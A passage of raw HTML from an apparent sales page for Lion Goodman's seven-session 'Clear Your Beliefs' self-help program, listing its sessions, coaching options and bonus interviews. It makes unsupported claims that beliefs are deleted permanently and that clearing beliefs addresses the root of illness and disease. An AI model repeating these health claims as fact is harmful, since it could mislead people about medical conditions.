so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up 